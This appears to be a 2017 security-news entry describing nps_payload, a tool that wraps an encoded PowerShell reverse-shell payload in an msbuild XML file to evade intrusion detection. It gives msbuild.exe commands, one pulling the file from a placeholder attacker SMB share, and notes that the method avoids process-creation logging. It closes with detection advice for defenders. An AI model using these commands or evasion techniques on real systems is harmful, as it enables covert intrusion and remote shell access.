Intrusion Detection Avoidance Payload Generator: NPS_Payload

2017-08-07T18:58:27
ID N0WHERE:171946
Type n0where
Reporter N0where
Modified 2017-08-07T18:58:27

Description

This script will generate payloads for basic intrusion detection avoidance. It utilizes publicly demonstrated techniques from several different sources. Written by Larry Spohn ( @Spoonman1091 ) Payload written by Ben Mauch ( @Ben0xA ) aka dirty_ben.

This tool provides a way to generate a PowerShell payload which will be inserted into the msbuild_nps.xml file and will use nps to execute the payload when msbuild.exe runs the file. Similar to Dave Kennedy’s unicorn, nps_payload also provides a Metasploit console resource (msbuild_nps.rc) file.

There are two ways you can deploy the msbuild_nps.xml file. The first is to copy the msbuild_nps.xml file to the remote host and then use the following command to execute.

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\<path_to_msbuild_nps.xml>

This second way is to host the msbuild_nps.xml file on a SMB share and use UNC path with the msbuild.exe command to point to the xml file.

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\<attacker_ip>\<share>\msbuild_nps.xml

This will run the encoded PowerShell payload using nps and will return a shell to the attacker. Once the attacker migrates to a new process, msbuild.exe will exit. It is important to note that nps executes the PowerShell code without invoking powershell.exe and will not show up in Event ID 4688 (New Process Created).

For Defenders, you can detect this attack by monitoring Event ID 4688 events for any invocation of msbuild.exe and then to check the command line arguments for any reference to UNC or local files. You can also enable PowerShell logging and monitor Event ID 4104 Events and look for any PowerShell code which is encoded.

Intrusion Detection Avoidance Payload Generator: NPS_Payload